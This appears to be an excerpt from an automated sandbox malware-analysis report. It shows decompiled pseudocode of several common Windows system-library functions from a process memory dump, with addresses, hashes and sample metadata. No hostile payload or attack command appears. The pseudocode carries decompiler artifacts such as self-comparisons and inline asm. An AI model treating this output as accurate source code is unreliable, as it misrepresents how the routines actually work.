					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E036C9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7746c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E036C2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x036def4b
0x036def4d
0x036def57
0x036df0bd
0x036df0c2
0x036df0d2
0x036df0d2
0x036df0c2
0x036def5d
0x036def5f
0x036def67
0x036def6a
0x036def6d
0x036def74
0x036def7f
0x036def82
0x036def82
0x036def86
0x036def88
0x036def8c
0x036def8f
0x036def8f
0x036def8f
0x00000000
0x036def91
0x036def93
0x036defc4
0x036defc4
0x036defc4
0x036defca
0x036defd0
0x036df0a6
0x00000000
0x00000000
0x036df0af
0x0372bb06
0x0372bb0a
0x036df0b5
0x036df0b5
0x036df0b5
0x036df0b5
0x00000000
0x036defd6
0x036defd9
0x036df0de
0x036df0e2
0x036defdf
0x036defdf
0x036defdf
0x036defe5
0x0372bafc
0x0372bafc
0x036defe5
0x036defeb
0x036defed
0x036df00f
0x036df011
0x036df01a
0x036df01d
0x036df021
0x036df028
0x036df029
0x036df029
0x036df02c
0x00000000
0x036df02c
0x036deff3
0x036deff9
0x036df0ea
0x036df0ed
0x036df0ef
0x00000000
0x036df0ef
0x036df003
0x0372bb12
0x036df045
0x036df049
0x036df051
0x036df09e
0x036df0a0
0x036df0a0
0x036df09e
0x036df053
0x036df064
0x036df064
0x036df06b
0x0372bb1a
0x0372bb1a
0x036df071
0x036df071
0x036df07d
0x036df082
0x036df08f
0x036df08f
0x036df009
0x036df00d
0x00000000
0x036df00d
0x036defd0
0x036def97
0x036defa5
0x036defaa
0x00000000
0x036defac
0x036defac
0x036defac
0x00000000
0x036defb2
0x036df036
0x036df03a
0x036df040
0x036df090
0x00000000
0x036df092
0x036df042
0x00000000
0x036df042
0x036defb7
0x036defb9
0x036defbc
0x036defb0
0x036defb0
0x00000000
0x036defbe
0x036defbe
0x036defc1
0x00000000
0x036defc1
0x036defbc
0x036defaa
0x036def91

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 7492c1490ee99ae8bb890ddc40c096dc3dec064b7614189c4ea2537ab58a4203
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 5A51C130E04249EFDB24CB69D2E07AEFBB1AF45314F1C81A9D4569F381C376A989C791

Uniqueness

Uniqueness Score: -1.00%

Function 0379740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0379740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0371D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0370F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L036E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L036E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0370F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L036E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0379740d
0x0379740d
0x03797412
0x03797413
0x03797416
0x03797418
0x0379741c
0x0379741f
0x03797422
0x03797422
0x03797428
0x0379742a
0x0379742a
0x03797451
0x03797432
0x0379744f
0x0379744f
0x00000000
0x03797434
0x03797438
0x03797443
0x03797517
0x03797517
0x0379751a
0x03797535
0x03797520
0x03797527
0x0379752c
0x03797531
0x03797533
0x00000000
0x03797533
0x00000000
0x03797531
0x0379754b
0x0379754f
0x0379755c
0x0379755c
0x0379755f
0x03797560
0x03797561
0x03797562
0x03797563
0x03797568
0x0379756a
0x0379756c
0x0379756d
0x0379756d
0x0379756f
0x03797572
0x03797574
0x03797577
0x0379757c
0x0379757f
0x00000000
0x03797551
0x03797551
0x03797551
0x03797553
0x03797553
0x03797449
0x03797449
0x0379744c
0x0379744c
0x00000000
0x0379744c
0x03797443
0x0379750e
0x03797514
0x03797514
0x03797455
0x03797469
0x0379746d
0x00000000
0x03797473
0x03797473
0x03797476
0x03797480
0x03797484
0x0379748e
0x03797493
0x03797493
0x03797496
0x03797499
0x037974a1
0x037974b1
0x037974b5
0x00000000
0x037974bb
0x037974c1
0x037974c1
0x037974c4
0x037974c5
0x037974c6
0x037974c7
0x037974c8
0x037974cd
0x00000000
0x037974d3
0x037974d3
0x037974d6
0x037974d8
0x037974db
0x037974dd
0x037974e0
0x037974e7
0x037974ee
0x037974ee
0x037974f4
0x037974f9
0x00000000
0x037974fb
0x037974fb
0x037974fd
0x03797500
0x03797503
0x03797505
0x03797505
0x037974f9
0x00000000
0x037974cd
0x037974b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 1bc0dd280cf444757073ee717ce659cb845cbfe7237e502c03c1f65487c91c59
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: A4517C71600646EFDF19CF14D480A96FBB9FF45304F18C1AAE9089F262E771E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 036F2990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E036F2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x379ff00);
				E0371D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x36a1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0370E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x36a1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E037451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x36a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E036F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E036D6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E036F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E036F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E036F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E036F2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0371D0D1(_t62);
				goto L28;
			}

0x036f2990
0x036f2992
0x036f2997
0x036f29a3
0x036f29a6
0x036f29ab
0x036f29ad
0x036f29b2
0x03735c80
0x036f29b8
0x036f29b8
0x036f29bb
0x036f29c0
0x036f29c5
0x036f29c6
0x036f29c6
0x036f29cb
0x00000000
0x00000000
0x036f29cd
0x036f29d0
0x036f29d9
0x036f29db
0x036f29dd
0x036f2a7f
0x036f2a84
0x036f2a87
0x036f2a89
0x03735ca1
0x03735ca3
0x00000000
0x036f2a8f
0x036f2a8f
0x00000000
0x036f2a8f
0x00000000
0x036f29e3
0x036f29e3
0x036f29e3
0x00000000
0x036f29e3
0x036f29dd
0x00000000
0x036f29db
0x036f29e6
0x036f29e9
0x036f29eb
0x036f29ed
0x036f29f3
0x036f29f5
0x036f29f8
0x036f29fa
0x036f2a97
0x036f2a9a
0x036f2a9d
0x036f2add
0x00000000
0x036f2a9f
0x036f2aa2
0x036f2aa5
0x036f2aa8
0x036f2aab
0x03735cab
0x03735caf
0x03735cc5
0x03735cda
0x03735cdc
0x03735cdf
0x03735ce5
0x00000000
0x03735ceb
0x03735ced
0x03735cee
0x00000000
0x03735cee
0x03735cb1
0x03735cb4
0x03735cb9
0x03735cbb
0x00000000
0x03735cbd
0x03735cbd
0x00000000
0x03735cbd
0x03735cbb
0x036f2ab1
0x036f2ab1
0x036f2ac4
0x036f2ac6
0x036f2ac6
0x00000000
0x036f2ac6
0x036f2aab
0x00000000
0x036f2a00
0x036f2a09
0x036f2a0e
0x036f2a21
0x036f2a24
0x036f2a35
0x036f2a3a
0x036f2a3d
0x036f2a42
0x036f2a59
0x036f2a59
0x036f2a5c
0x036f2a5f
0x036f2a5f
0x036f29fa
0x036f29f3
0x036f2a64
0x036f2a64
0x036f2a6b
0x036f2a6b
0x036f2a6d
0x036f2a72
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736bfabc0b13abac302dc6ce8ae123305675a2057df0bc020eb86efc7ecd9d19
Instruction ID: df4af246d9c7273201a8cd196333188067dfd034a5e43dc4c5f1fdc18a42068c
Opcode Fuzzy Hash: 736bfabc0b13abac302dc6ce8ae123305675a2057df0bc020eb86efc7ecd9d19
Instruction Fuzzy Hash: E8517A7990020ADFCF25CF59C990ADEBBB5BF09314F088559EA10AB360C3759952CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 036F4BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E036F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x37bd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E036CCC50(_t86);
					L11:
					return E0370B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x37b8504
				E036E2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0370FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0370B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L036E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E036CCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x37b8504
								E036DFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E036F4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x036f4bad
0x036f4bbf
0x036f4bc2
0x036f4bc6
0x036f4bcd
0x036f4bd9
0x037367fe
0x03736800
0x036f4ccc
0x036f4ccd
0x036f4cb7
0x036f4cc9
0x036f4cc9
0x036f4bdf
0x036f4be5
0x00000000
0x00000000
0x036f4beb
0x036f4bef
0x00000000
0x00000000
0x036f4bf5
0x036f4bf9
0x036f4c06
0x036f4c0b
0x036f4c17
0x036f4c1c
0x036f4c1f
0x036f4c25
0x036f4c33
0x036f4c3d
0x036f4c40
0x036f4c43
0x036f4c47
0x036f4c4d
0x036f4c53
0x036f4c54
0x036f4c55
0x036f4c56
0x036f4c5b
0x036f4c5c
0x036f4c63
0x036f4c6b
0x00000000
0x00000000
0x03736776
0x03736784
0x03736784
0x0373679f
0x037367a7
0x037367af
0x037367ce
0x00000000
0x037367b1
0x037367b7
0x037367b8
0x037367c1
0x037367d3
0x037367d9
0x037367dd
0x036f4c94
0x036f4c94
0x036f4c98
0x036f4c9c
0x036f4ca3
0x037367f4
0x037367f4
0x036f4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x036f4cb5
0x036f4c79
0x036f4c7e
0x036f4c89
0x036f4c8b
0x036f4c8f
0x036f4c8f
0x00000000
0x036f4c89
0x037367c3
0x00000000
0x037367c3
0x037367af
0x036f4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bbc23d2866b7411b1ff2b323e5df5039cf53fcce130b15b7a77d5756802ad00
Instruction ID: 9e7864bb4fd2bd876e8de9f730b92bca7113c89e05f30d2620a551c9ae089e30
Opcode Fuzzy Hash: 8bbc23d2866b7411b1ff2b323e5df5039cf53fcce130b15b7a77d5756802ad00
Instruction Fuzzy Hash: 0141A835A01218AFCB21DF65C940FEA77B8EF46710F4500A9E908AF241DB74DE85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 036F4D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E036F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x37bd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0370FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x37b7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0370B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L036E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E036CCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0370B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0370F380(_t67 + 0xc, 0x36a5138, 0x10) == 0) {
								 *0x37b60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E036F4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E036F4E70(0x37b86b0, 0x36f5690, 0, 0) != 0) {
					_t46 = E036CCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x036f4d3b
0x036f4d4d
0x036f4d53
0x036f4d58
0x036f4d65
0x036f4d6c
0x036f4d71
0x036f4d77
0x036f4d7f
0x036f4d8c
0x036f4d8e
0x036f4dad
0x036f4db0
0x036f4db7
0x036f4db8
0x036f4db9
0x036f4dba
0x036f4dbb
0x036f4dc1
0x036f4dc8
0x036f4dcc
0x036f4dd5
0x036f4dde
0x036f4ddf
0x036f4de0
0x036f4de1
0x036f4de6
0x036f4de7
0x036f4de9
0x036f4df3
0x00000000
0x00000000
0x03736c7c
0x03736c8a
0x03736c8a
0x03736c9d
0x03736ca7
0x03736cac
0x03736cb2
0x03736cb9
0x00000000
0x03736cbf
0x03736cbf
0x00000000
0x03736cbf
0x03736cb9
0x036f4dfb
0x03736ccf
0x03736cd3
0x036f4e32
0x036f4e39
0x03736ce0
0x03736cf2
0x03736cf2
0x03736ce0
0x036f4e3f
0x036f4e41
0x036f4e51
0x036f4e51
0x036f4e03
0x036f4e03
0x036f4e09
0x036f4e0f
0x036f4e57
0x00000000
0x00000000
